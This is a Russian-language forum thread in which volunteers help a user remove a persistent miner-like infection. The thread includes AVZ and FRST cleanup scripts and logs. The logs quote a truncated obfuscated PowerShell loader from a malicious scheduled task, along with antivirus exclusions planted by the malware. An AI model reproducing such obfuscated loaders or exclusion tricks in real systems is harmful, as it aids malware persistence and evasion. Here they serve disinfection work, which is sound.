[РЕШЕНО] вирус который маскируется под системный процесс Телефон Microsoft Windows

[sencity72]

Добрый день, поймал вирус - силно загружает энергопотребление - ноутбук работает на максимальном охлождении постоянно - ранее небыло видно этого процесса в диспетчере задач, а теперь он на самом верху -  Телефон Microsoft Windows, при попытке отключить процесс - система уходит в синий экран

CollectionLog-2025.04.25-19.02.zip

[Sandor]

Здравствуйте!

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 DeleteSchedulerTask('dialersvc64');
 ExecuteRepair(19);
RebootWindows(false);
end.

 

Компьютер перезагрузится.

 

Дополнительно:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

 

[sencity72]

Addition.txt FRST.txt

[Sandor]

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

• Отключите до перезагрузки антивирус.
• Выделите следующий код:

  Start::
  CloseProcesses:
  SystemRestore: On
  CreateRestorePoint:
  HKLM\SOFTWARE\Policies\Microsoft\MRT: Ограничение <==== ВНИМАНИЕ
  HKU\S-1-5-21-1488824550-1789792169-3620093603-1001\...\Run: [AltServer] => D:\program\erer\AltServer.exe (Нет файла)
  HKLM\SOFTWARE\Policies\Mozilla\Firefox: Ограничение <==== ВНИМАНИЕ
  HKLM\SOFTWARE\Policies\Google: Ограничение <==== ВНИМАНИЕ
  HKLM\SOFTWARE\Policies\Microsoft\Edge: Ограничение <==== ВНИМАНИЕ
  HKLM\SOFTWARE\Policies\BraveSoftware\Brave: Ограничение <==== ВНИМАНИЕ
  HKLM\SOFTWARE\Policies\Vivaldi: Ограничение <==== ВНИМАНИЕ
  HKLM\SOFTWARE\Policies\YandexBrowser: Ограничение <==== ВНИМАНИЕ
  Task: {483056A4-6915-4A69-8773-81BB16B4E870} - System32\Tasks\dialersvc64 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-14] (Microsoft Windows -> Microsoft Corporation) -> "function Local:sKtQvUxdKEKx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CiATVKHiIcJvmA,[Parameter(Position=1)][Type]$UBPRUMeqid)$IjUcGbIVBJp=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+[Char](101) (запись имеет ещё 4984 символов). <==== ВНИМАНИЕ
  FF user.js: detected! => C:\Users\easen\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\user.js [2025-04-03]
  CHR HKU\S-1-5-21-1488824550-1789792169-3620093603-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjmpfdkmpojoeemjmfiddlhkkndcdpno]
  CHR HKLM-x32\...\Chrome\Extension: [pfigaoamnncijbgomifamkmkidnnlikl]
  S3 BITS_bkp; C:\WINDOWS\System32\qmgr.dll [1481728 2024-05-15] (Microsoft Windows -> Microsoft Corporation)
  S2 UsoSvc_bkp; C:\WINDOWS\system32\usosvc.dll [583168 2025-04-09] (Microsoft Windows -> Microsoft Corporation)
  S3 WaaSMedicSvc_bkp; C:\WINDOWS\System32\WaaSMedicSvc.dll [427520 2025-04-09] (Microsoft Windows -> Microsoft Corporation)
  S3 wuauserv_bkp; C:\WINDOWS\system32\wuaueng.dll [3433472 2025-03-12] (Microsoft Windows -> Microsoft Corporation)
  S2 Bonjour Service; "C:\Program Files\Bonjour\mDNSResponder.exe" [X]
  AlternateDataStreams: C:\ProgramData\TEMP:07BF512B [124]
  AlternateDataStreams: C:\Users\easen\Downloads\80dysb1s.exe:MBAM.Zone.Identifier [203]
  FirewallRules: [{4FB46B33-E058-4803-8768-885471C2A06A}] => (Allow) LPort=1900
  FirewallRules: [{36C5D5B3-2756-417D-8586-C20854E8D941}] => (Allow) LPort=2869
  FirewallRules: [{91D940DB-C0F5-4F6D-A71E-97FE7364A9E3}] => (Allow) LPort=1900
  FirewallRules: [{84B7B86F-E4A0-4398-B784-C7C4DEB589F8}] => (Allow) LPort=2869
  ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
  EmptyTemp:
  Reboot:
  End::

   

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

 

Скачайте этот архив. Извлеките из него файлы и последовательно запустите каждый, соглашаясь с внесением изменений в реестр.

Перезагрузите компьютер и удалите старые и соберите новые логи FRST.txt и Addition.txt

[sencity72]

Не понял - какой архив скачать ...  скрипт вроде выполнил

Fixlog.txt

обратил внимание, что в ProgramData есть папка Moziila Corporation, в которой файл Firefoxx.exe - у меня нет этого браузера и если удалить эту папку - она появляется снова 

 

Addition.txt FRST.txt

[Sandor]

Прошу прощения, забыл ссылку на архив добавить. Вот она.

После применения твиков перезагрузите компьютер и ещё раз соберите новые логи Farbar.

[Sandor]

Впрочем, вот новый скрипт.

• Отключите до перезагрузки антивирус.
• Выделите следующий код:

  Start::
  CloseProcesses:
  SystemRestore: On
  CreateRestorePoint:
  HKLM\SOFTWARE\Policies\Microsoft\MRT: Ограничение <==== ВНИМАНИЕ
  HKU\S-1-5-21-1488824550-1789792169-3620093603-1001\SOFTWARE\Policies\Google: Ограничение <==== ВНИМАНИЕ
  Task: {451D261B-A447-40F2-BC30-2B1A04C59CCF} - System32\Tasks\dialersvc64 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-14] (Microsoft Windows -> Microsoft Corporation) -> "function Local:AlIQLiRYsLoN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KSJVuDUVzSiwqW,[Parameter(Position=1)][Type]$uhHaaItNpC)$JxsnuXSQrrO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116 (запись имеет ещё 4845 символов). <==== ВНИМАНИЕ
  Task: {808EE1D7-E7A4-47EF-8ACB-D13EDB2EE8AA} - System32\Tasks\dialersvc64 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [455680 2024-02-14] (Microsoft Windows -> Microsoft Corporation) -> "function Local:AlIQLiRYsLoN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KSJVuDUVzSiwqW,[Parameter(Position=1)][Type]$uhHaaItNpC)$JxsnuXSQrrO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116 (запись имеет ещё 4845 символов). <==== ВНИМАНИЕ
  S2 dosvc_bkp; C:\WINDOWS\system32\dosvc.dll [1526272 2024-12-12] (Microsoft Windows -> Microsoft Corporation)
  S2 Firefoxx; C:\ProgramData\Moziila Corporation\Firefoxx.exe [22121472 2025-04-26] (Firefox) [Файл не подписан]
  Folder: C:\ProgramData\Moziila Corporation
  2025-04-26 12:53 - 2025-04-26 12:53 - 000000000 ____D C:\ProgramData\Moziila Corporation
  StartPowershell:
  Remove-MpPreference -ExclusionExtension ".exe"
  Remove-MpPreference -ExclusionPath "C:\WINDOWS\system32\config\systemprofile"
  Remove-MpPreference -ExclusionPath "C:\ProgramData"
  EndPowerShell:
  ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
  Reboot:
  End::

   

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

Твики можно выполнять до или после скрипта. Новые логи - желательно после.

[sencity72]

ничего не поменялось

Addition.txt Fixlog.txt FRST.txt

 

Если отключить интернет, то активность этой программы равна 0% и ноутбук затихает..., стоит включить интернет - то снова начинает нагружать ЦП

 

[safety]

Сделайте, пожалуйста, образ автозапуска в uVS с отслеживанием процессов и задач:

 

1. Скачайте архив с актуальной версией утилиты uVS c зеркала программы отсюда (1) (здесь дополнительно встроен архиватор 7zip), распакуйте данный архив с программой в отдельный каталог.

2. запустите из каталога с модулями uVS файл Start.exe
(для Vista, W7- W11 выберите запуск от имени Администратора)
3. В стартовом окне программы - нажать "запустить под текущим пользователем". (если текущий пользователь с правами локального администратора)

3.1 Если запросили обычный образ автозапуска, переходим сразу к п.4
Если запросили образ автозапуска с отслеживанием процессов и задач:
В главном меню выбираем "Дополнительно" - Твики" - нажимаем "твик 39" и перегружаем систему. После перезагрузки переходим к п.2 и выполняем все действия из 2, 3, 4, 5, 6.
4. Далее, меню "Файл" / Сохранить Полный образ автозапуска.

5. Дождитесь, пока процесс создания файла образа завершится.
Сохраненный файл образа автозапуска (с именем Ваш_компьютер_дата_время*.txt) автоматически добавится в архив 7z. (если используется uVS из зеркала со встроенным архиватором 7z)

6. Файл архива с образом автозапуска прикрепите к вашему сообщению на форуме

Изменено 28 апреля, 2025 пользователем safety

[sencity72]

Из этой программы выкидывает автоматически после "запустить под текущим пользователем", до п. 4 не доходит (перед закрытием удалось сделать скрин - это последнее, после программа сама закрывается)

 

[safety]

Попробуйте после запуска start.exe вначале в стартовом меню  выбрать мышкой  параметр "выгружать DLL и уничтожать потоки, внедренные в uVS". Затем уже выбирает "запусить под текущим пользователем".

Если не получится создать образ автозапуска таким образом, тогда сделайте образ автозапуска из безопасного режима системы.

Изменено 28 апреля, 2025 пользователем safety

[sencity72]

Сделал Выгружать DDL ... не созает образ - уходит в ошибку, в безопасном режиме тоже самое 

 

 

 

[safety]

В безопасном режиме этот параметр "выгружать DLL и уничтожать потоки, внедренные в uVS""убираем.

Если так не получается, пробуйте через интеграцию uVS.

т.е. вначале необходимо выполнить интеграцию, затем загрузиться в меню доп. параметров загрузки,

найдете там строку запуска с uVS.

Изменено 28 апреля, 2025 пользователем safety

[sencity72]

Сделал интеграцию - бесполезно - выкидывает и всё, сворачивается программа сама

 

[safety]

Хорошо, крепкий орешек значит попался.

 

Пробуйте из под Winpe собрать образ автозапуска.

Образ скачать отсюда, записать на загрузочную флэшку.

Как создать образ автозапуска из под Winpe